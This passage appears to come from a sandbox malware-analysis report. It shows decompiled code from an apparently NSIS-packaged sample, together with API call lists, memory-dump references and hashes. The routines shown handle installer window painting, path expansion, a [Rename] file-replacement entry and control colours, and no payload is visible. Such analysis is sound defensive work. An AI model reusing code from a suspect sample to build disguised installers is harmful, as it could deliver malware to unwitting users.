				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                                                                      0x0040100a
                                                                                      0x00401039
                                                                                      0x00401047
                                                                                      0x0040104d
                                                                                      0x00401051
                                                                                      0x0040105b
                                                                                      0x00401061
                                                                                      0x00401064
                                                                                      0x004010f3
                                                                                      0x00401089
                                                                                      0x0040108c
                                                                                      0x004010a6
                                                                                      0x004010bd
                                                                                      0x004010cc
                                                                                      0x004010cf
                                                                                      0x004010d5
                                                                                      0x004010d9
                                                                                      0x004010e4
                                                                                      0x004010ed
                                                                                      0x004010ef
                                                                                      0x004010ef
                                                                                      0x00401100
                                                                                      0x00401105
                                                                                      0x0040110d
                                                                                      0x00401110
                                                                                      0x00401112
                                                                                      0x00401118
                                                                                      0x0040111f
                                                                                      0x00401126
                                                                                      0x00401130
                                                                                      0x00401142
                                                                                      0x00401156
                                                                                      0x00401160
                                                                                      0x00401165
                                                                                      0x00401165
                                                                                      0x00401110
                                                                                      0x0040116e
                                                                                      0x00000000
                                                                                      0x00401178
                                                                                      0x00401010
                                                                                      0x00401013
                                                                                      0x00401015
                                                                                      0x0040101f
                                                                                      0x0040101f
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                      • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                      • String ID: F
                                                                                      • API String ID: 941294808-1304234792
                                                                                      • Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                      • Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
                                                                                      • Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
                                                                                      • Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040657A Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 196stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 72%
                                                                                      			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x433edc - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x434f38 + _t44 * 2;
				_t45 = 0x432ea0;
				_t108 = 0x432ea0;
				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040653D(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x432ea0;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = L"ppingA" + (_t78 << 0xb);
								E0040653D(_t108, L"ppingA" + (_t78 << 0xb));
							} else {
								E00406484(_t108,  *0x434f08);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004067C4(_t108);
							}
							goto L38;
						}
						if( *0x434f84 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x434f04;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E0040657A(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}





























                                                                                      0x0040657a
                                                                                      0x0040657a
                                                                                      0x0040657a
                                                                                      0x00406580
                                                                                      0x00406585
                                                                                      0x00406596
                                                                                      0x00406596
                                                                                      0x0040659e
                                                                                      0x0040659f
                                                                                      0x004065a0
                                                                                      0x004065a1
                                                                                      0x004065a4
                                                                                      0x004065ac
                                                                                      0x004065ae
                                                                                      0x004065bf
                                                                                      0x004065c2
                                                                                      0x004065c2
                                                                                      0x004065c6
                                                                                      0x004065cc
                                                                                      0x004065cf
                                                                                      0x004067aa
                                                                                      0x004067aa
                                                                                      0x004067b5
                                                                                      0x004067c1
                                                                                      0x004067c1
                                                                                      0x00000000
                                                                                      0x004065d5
                                                                                      0x004065da
                                                                                      0x004065ef
                                                                                      0x004065f0
                                                                                      0x004065f6
                                                                                      0x00406788
                                                                                      0x00406796
                                                                                      0x00406799
                                                                                      0x00406799
                                                                                      0x0040678a
                                                                                      0x0040678d
                                                                                      0x00406790
                                                                                      0x00406792
                                                                                      0x00406792
                                                                                      0x0040679b
                                                                                      0x0040679b
                                                                                      0x004067a1
                                                                                      0x004067a4
                                                                                      0x004065d7
                                                                                      0x00000000
                                                                                      0x004065d7
                                                                                      0x00000000
                                                                                      0x004067a4
                                                                                      0x004065fc
                                                                                      0x004065ff
                                                                                      0x0040660e
                                                                                      0x00406615
                                                                                      0x00406621
                                                                                      0x00406624
                                                                                      0x00406627
                                                                                      0x00406628
                                                                                      0x0040662d
                                                                                      0x00406633
                                                                                      0x00406636
                                                                                      0x00406639
                                                                                      0x0040672c
                                                                                      0x00406731
                                                                                      0x00406764
                                                                                      0x00406769
                                                                                      0x0040676e
                                                                                      0x00406773
                                                                                      0x00406773
                                                                                      0x00406778
                                                                                      0x0040677e
                                                                                      0x00406781
                                                                                      0x00000000
                                                                                      0x00406781
                                                                                      0x00406733
                                                                                      0x00406736
                                                                                      0x00406739
                                                                                      0x0040674e
                                                                                      0x00406755
                                                                                      0x0040673b
                                                                                      0x00406742
                                                                                      0x00406742
                                                                                      0x0040675d
                                                                                      0x00406760
                                                                                      0x00406724
                                                                                      0x00406725
                                                                                      0x00406725
                                                                                      0x00000000
                                                                                      0x00406760
                                                                                      0x00406646
                                                                                      0x0040664a
                                                                                      0x0040664a
                                                                                      0x0040664b
                                                                                      0x0040664d
                                                                                      0x0040668a
                                                                                      0x0040668d
                                                                                      0x0040669d
                                                                                      0x004066a0
                                                                                      0x004066a8
                                                                                      0x004066ae
                                                                                      0x004066ae
                                                                                      0x00406709
                                                                                      0x00406709
                                                                                      0x0040670b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004066b2
                                                                                      0x004066b7
                                                                                      0x004066b8
                                                                                      0x004066ba
                                                                                      0x004066d1
                                                                                      0x004066df
                                                                                      0x004066e5
                                                                                      0x004066e7
                                                                                      0x00406705
                                                                                      0x00406705
                                                                                      0x00406705
                                                                                      0x00000000
                                                                                      0x00406705
                                                                                      0x004066ed
                                                                                      0x004066f6
                                                                                      0x004066f9
                                                                                      0x004066ff
                                                                                      0x00406703
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406703
                                                                                      0x004066cb
                                                                                      0x004066cd
                                                                                      0x004066cf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004066cf
                                                                                      0x00000000
                                                                                      0x00406709
                                                                                      0x00406695
                                                                                      0x00000000
                                                                                      0x0040664f
                                                                                      0x0040666d
                                                                                      0x00406676
                                                                                      0x00406713
                                                                                      0x00406717
                                                                                      0x0040671f
                                                                                      0x0040671f
                                                                                      0x00000000
                                                                                      0x00406717
                                                                                      0x00406680
                                                                                      0x0040670d
                                                                                      0x00406711
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406711
                                                                                      0x0040664d
                                                                                      0x00000000
                                                                                      0x004065da

                                                                                      APIs
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,00000000,?,75A423A0), ref: 004066A8
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000), ref: 00406779
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$ppingA
                                                                                      • API String ID: 4260037668-1593600796
                                                                                      • Opcode ID: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                                                      • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                      • Opcode Fuzzy Hash: 03b6c86d0f000171db59b2cc8690753f548b227a8176050573a5c3190704fa58
                                                                                      • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406183 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00406183(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x430908 = 0x55004e;
				 *0x43090c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x431108, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x430508, "%ls=%ls\r\n", 0x430908, 0x431108);
						_t53 = _t52 + 0x10;
						E0040657A(_t37, 0x400, 0x431108, 0x431108,  *((intOrPtr*)( *0x434f10 + 0x128)));
						_t12 = E0040602D(0x431108, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004060B0(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F92(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F92(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FE8(_t24 + _t46, 0x430508, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060DF(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040602D(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x430908, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                                                                      0x00406183
                                                                                      0x0040618c
                                                                                      0x00406193
                                                                                      0x0040619d
                                                                                      0x004061b1
                                                                                      0x004061d9
                                                                                      0x004061e4
                                                                                      0x004061e8
                                                                                      0x00406208
                                                                                      0x0040620f
                                                                                      0x00406219
                                                                                      0x00406226
                                                                                      0x0040622b
                                                                                      0x00406230
                                                                                      0x00406234
                                                                                      0x00406243
                                                                                      0x00406245
                                                                                      0x00406252
                                                                                      0x00406256
                                                                                      0x004062f1
                                                                                      0x00000000
                                                                                      0x0040626c
                                                                                      0x00406279
                                                                                      0x0040629d
                                                                                      0x004062a1
                                                                                      0x004062c0
                                                                                      0x004062c4
                                                                                      0x004062c4
                                                                                      0x004062c6
                                                                                      0x004062cf
                                                                                      0x004062da
                                                                                      0x004062e5
                                                                                      0x004062eb
                                                                                      0x00000000
                                                                                      0x004062eb
                                                                                      0x004062a3
                                                                                      0x004062a6
                                                                                      0x004062b1
                                                                                      0x004062ad
                                                                                      0x004062af
                                                                                      0x004062b0
                                                                                      0x004062b0
                                                                                      0x004062b8
                                                                                      0x004062ba
                                                                                      0x00000000
                                                                                      0x004062ba
                                                                                      0x00406284
                                                                                      0x0040628a
                                                                                      0x00000000
                                                                                      0x0040628a
                                                                                      0x00406256
                                                                                      0x00406234
                                                                                      0x004061b3
                                                                                      0x004061be
                                                                                      0x004061c7
                                                                                      0x004061cb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004061cb
                                                                                      0x004062fc

                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040631E,?,?), ref: 004061BE
                                                                                      • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                        • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                      • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                                                      • wsprintfA.USER32 ref: 00406202
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                                                      • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                      • API String ID: 2171350718-461813615
                                                                                      • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                      • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                                                      • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                                                      • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                      0x00404512
                                                                                      0x004045c8
                                                                                      0x00000000
                                                                                      0x004045c8
                                                                                      0x00404523
                                                                                      0x00404527
                                                                                      0x00000000
                                                                                      0x00404541
                                                                                      0x00404541
                                                                                      0x0040454a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040454c
                                                                                      0x00404558
                                                                                      0x0040455b
                                                                                      0x0040455b
                                                                                      0x00404561
                                                                                      0x00404567
                                                                                      0x00404567
                                                                                      0x00404573
                                                                                      0x00404579
                                                                                      0x00404580
                                                                                      0x00404583
                                                                                      0x00404586
                                                                                      0x00404588
                                                                                      0x00404588
                                                                                      0x00404590
                                                                                      0x00404596
                                                                                      0x00404596
                                                                                      0x004045a0
                                                                                      0x004045a5
                                                                                      0x004045a8
                                                                                      0x004045ad
                                                                                      0x004045b0
                                                                                      0x004045b0
                                                                                      0x004045c0
                                                                                      0x004045c0
                                                                                      0x00000000
                                                                                      0x004045c3

                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                      • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                      • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                      • GetSysColor.USER32(?), ref: 00404586
                                                                                      • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                      • DeleteObject.GDI32(?), ref: 004045B0
                                                                                      • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
